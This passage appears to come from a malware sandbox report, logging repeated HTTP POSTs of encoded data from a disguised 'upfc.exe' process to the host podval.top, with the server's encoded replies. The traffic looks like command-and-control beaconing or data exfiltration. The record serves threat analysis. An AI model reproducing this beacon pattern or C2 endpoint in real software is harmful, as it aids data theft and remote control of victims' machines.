                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:28.713335037 CEST1748OUTData Raw: 5f 54 5f 5b 5b 5c 57 59 58 56 55 51 50 50 59 5a 55 58 5e 54 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_[[\WYXVUQPPYZUX^TQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\&,E0(33?=>&!=.-9Z&5337T8X7!4^/"['$Y
                                                    Jul 3, 2024 16:43:28.816402912 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:29.164091110 CEST727INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K3uJLJLD4DkQRQH3vZlBusgcAeFDW%2BQyfizKmHQesESG8AoOa1PMQU4C57q0r1BbLjIt9FSjwmu34CDzYhesxzjGSm%2FhUCfWetb8dTJma3SFvI6tx7wjqiWmFp6X"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e8def15e7d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5d 26 29 2d 1e 25 22 2f 1b 39 3d 33 57 29 3d 28 59 2c 17 2d 16 2a 37 2a 01 3a 00 35 08 34 3a 0f 04 2b 05 2c 5c 31 23 3c 55 23 21 20 5b 04 1c 23 11 3f 29 35 12 28 28 24 0a 24 3c 21 08 25 27 29 1e 33 28 2d 0d 33 06 09 1f 28 01 25 50 30 31 2f 58 2b 28 31 06 3c 09 08 5e 21 24 21 54 02 13 22 1c 24 3e 35 55 34 33 37 52 27 30 21 14 33 24 2c 0a 30 33 2a 52 29 20 22 55 26 31 3c 5a 22 59 34 0a 33 28 26 16 27 3e 25 11 23 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%]&)-%"/9=3W)=(Y,-*7*:54:+,\1#<U#! [#?)5(($$<!%')3(-3(%P01/X+(1<^!$!T"$>5U437R'0!3$,03*R) "U&1<Z"Y43(&'>%#(#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    103192.168.2.1049821188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:28.499655008 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:28.854458094 CEST1060OUTData Raw: 5a 57 5a 5f 5b 59 57 5d 58 56 55 51 50 5c 59 53 55 59 5e 5d 51 55 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZWZ_[YW]XVUQP\YSUY^]QUS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[')?0?]'V+\)&#!Y:>5]$%-0?U->74T+,"['$Y 1
                                                    Jul 3, 2024 16:43:28.948498964 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:29.314923048 CEST577INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kIBkqq5Rb%2B87029gidNh6w%2BneUzzX1%2F4dC2fU8xzHRFRpbrCA5fCJvRj2DEUqbdQPI0Ykoth4OYQ6cbQwYHVwk7Nw2dCn7Jk3xype0S5xKa1YDS8Nf8kd%2Bra4OyZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e9a9f77d0b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:29.401619911 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    104192.168.2.1049822188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:29.543776989 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:29.902895927 CEST1060OUTData Raw: 5f 53 5f 55 5b 56 52 5b 58 56 55 51 50 51 59 50 55 51 5e 5b 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_U[VR[XVUQPQYPUQ^[QTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&:;':+_'+^>X27),==]$6%'#;7X7<[;"['$Y
                                                    Jul 3, 2024 16:43:30.262739897 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:30.264024973 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9NvvmDIYTvJhkYMvdqL31Q1b9QSrgmYmHnRefhMmRI0j4ccztB3%2BF0UwBKIRLXqlRG8gMG1FLel3shmlQ%2FQLpjs08V4OBa3Y9hN6fs8xAoLKy3kd3Cdc8KRGfYF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f0284242da-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:43:30.264036894 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9NvvmDIYTvJhkYMvdqL31Q1b9QSrgmYmHnRefhMmRI0j4ccztB3%2BF0UwBKIRLXqlRG8gMG1FLel3shmlQ%2FQLpjs08V4OBa3Y9hN6fs8xAoLKy3kd3Cdc8KRGfYF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f0284242da-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    105192.168.2.1049823188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:30.392620087 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:30.744587898 CEST1060OUTData Raw: 5a 57 5f 5b 5b 5f 57 59 58 56 55 51 50 5f 59 56 55 5a 5e 5d 51 5c 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZW_[[_WYXVUQP_YVUZ^]Q\S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]%_$':<3;](=67=>.>.&&)Z$ <,X'X4T$^,"['$Y =
                                                    Jul 3, 2024 16:43:30.886224031 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:31.086936951 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ic8VmuOrWkGu5IwXMiEezyNdGPQriJTdANNObT2%2FpgbHdxbuAVlX4Pj1tmZM6HJ3qHYOEE1sGOStQZVbO%2Ffn8tlfBq1Mh2%2BqrNihIKTflEIwMQ%2BmgW%2BVo783adWR"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5f5a8ab3338-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    106192.168.2.1049824188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:31.218077898 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:31.575375080 CEST1060OUTData Raw: 5f 57 5f 55 5b 56 57 59 58 56 55 51 50 5f 59 53 55 50 5e 5c 51 55 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _W_U[VWYXVUQP_YSUP^\QUS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[&9 &)^03#\>X27[!,>5Z&%\3 8; 2(Z,<"['$Y =
                                                    Jul 3, 2024 16:43:31.670202971 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:31.878946066 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EpIMDv4QUfJMOgMwRzq%2FycOVSsm2q8DxqEHCCBxAFIcBF0d%2FysHYuPiYmxlpsyeQc6gCxq1Z2bmGB3higVpBYup6PhumW7Hf3DE92iEhQwXjFqZ%2Bvphrzyz%2Bj1Gg"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5faadc48ccc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    107192.168.2.1049825188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:32.020035028 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:32.369653940 CEST1060OUTData Raw: 5a 50 5a 5f 5b 57 52 5b 58 56 55 51 50 5e 59 56 55 5b 5e 5a 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ_[WR[XVUQP^YVU[^ZQXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[1A390'*&72:=!&%5'U 8> 20-,"['$Y
                                                    Jul 3, 2024 16:43:32.489301920 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:32.667859077 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7duWWZh072qj2pOUp01cjaVAhgNGE8lcq8TB7zy%2Bdiy5XPgkN%2FDtnNWs34NLRlXmtQU1TvQEQi635YkCehse5VOn6kp9YiUsQ%2Fon3ctDpZTHuQUI%2BDz%2Fo9lBueY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5ffa9417ced-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    108192.168.2.1049826188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:32.858467102 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:33.213408947 CEST1060OUTData Raw: 5a 56 5f 5f 5e 5d 57 5a 58 56 55 51 50 5a 59 57 55 5e 5e 59 51 54 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV__^]WZXVUQPZYWU^^YQTS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&C&*#_3V7^).)#!\:X5\&5!X$#T/'"!</,"['$Y )
                                                    Jul 3, 2024 16:43:33.313642025 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:33.642043114 CEST588INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YBuYWfRopfs5vv%2B7q8uDTG57Dw7%2Fq0ISDBt%2BVngwPUIy4x8eYj09um756El1xB%2BX9cBhs7n%2Bxz2O2G6sEA9WnaQOFaqz9nsRWU%2FHa950TC2xIlm6KFH8f%2F9xh1h6"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a604ea291996-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    109192.168.2.1049827188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:33.808743000 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:34.166680098 CEST1060OUTData Raw: 5f 53 5f 5c 5b 5b 52 5a 58 56 55 51 50 5b 59 5b 55 58 5e 5e 51 55 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_\[[RZXVUQP[Y[UX^^QUSZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&:<3/X'0+(>4":-Y'&=Z3U+V-., 2 Y,,"['$Y -


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    110192.168.2.1049828188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:34.198561907 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:34.557533026 CEST1748OUTData Raw: 5f 57 5a 5b 5e 5c 52 5d 58 56 55 51 50 5f 59 50 55 5b 5e 5e 51 59 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _WZ[^\R]XVUQP_YPU[^^QYSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2);'9#^3<>1S!=%Y,>:0C9'?S/X;^"17,"['$Y =
                                                    Jul 3, 2024 16:43:34.635180950 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:34.978106976 CEST731INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNAjqgcsk%2FQPxVjjrVhdGiUpFQj52ifw8DHotfGZ9WXr6pg8Oz%2BoT50GgPjWogXSn9JPGCg99oj1OFVAOGT1WGy7kIPOBWBwXS8jhApL3BXny%2Ft1FOmjUxSpGTHm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a60d3e857ce4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 06 26 2a 2d 5c 31 21 30 09 2d 2e 27 1b 3f 04 24 15 3b 3a 26 06 28 24 25 13 2c 2d 32 18 34 03 35 07 3c 05 28 16 25 1e 0e 54 35 31 20 5b 04 1c 20 04 3e 3a 21 5b 3f 16 20 0d 26 3c 22 19 25 24 22 02 27 05 29 0a 27 38 2f 12 3c 5e 35 55 26 31 30 05 2b 28 08 5a 2a 34 36 1d 35 24 21 54 02 13 22 1c 30 2d 35 54 34 20 2c 0c 27 30 21 14 30 42 27 18 30 0a 2e 56 28 23 22 10 30 08 3c 11 21 3f 2c 0e 27 06 32 5d 33 03 2a 01 36 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&*-\1!0-.'?$;:&($%,-245<(%T51 [ >:![? &<"%$"')'8/<^5U&10+(Z*465$!T"0-5T4 ,'0!0B'0.V(#"0<!?,'2]3*6(#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    111192.168.2.1049829188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:34.422549009 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:34.776151896 CEST1060OUTData Raw: 5a 55 5a 5f 5b 5a 57 5c 58 56 55 51 50 5d 59 52 55 59 5e 54 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZ_[ZW\XVUQP]YRUY^TQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%98$* 'V#_=-!=[9.9Z$9%3;X;X"1 8<"['$Y 5
                                                    Jul 3, 2024 16:43:34.873919010 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:35.221559048 CEST590INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZKgT331b2%2BsfPzi2MoMK0PjkZ5DDdPycmOsaKpcg6H%2F%2FEvLqI4UAxU6y%2FXc%2FjO6%2Fz8geLS2DiXVxei0rCybltSmkMRUzBj5QMrb%2BXBMDzIi%2B7dcYrtowuqIUZX0T"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a60eaf9f8c35-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    112192.168.2.1049830188.114.97.380
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:34.748697996 CEST293OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:35.111377001 CEST344OUTData Raw: 00 00 04 04 06 0c 01 02 05 06 02 01 02 00 01 04 00 0b 05 0c 02 04 03 0d 01 02 0e 05 05 01 02 07 0a 02 06 0e 03 04 05 01 0d 00 05 0b 04 07 05 51 06 50 0f 0e 0e 57 04 0a 05 04 04 07 01 02 07 5b 03 53 0c 0c 05 06 01 07 0e 55 0c 50 0d 06 0f 01 05 50
                                                    Data Ascii: QPW[SUPPYR\L~|`bOvbuLa\kQ~|}O`Bl]ZJxR{Eo`WZS]Rww{Zj_~V@{CP}re
                                                    Jul 3, 2024 16:43:35.223052025 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:35.641561985 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:35 GMT
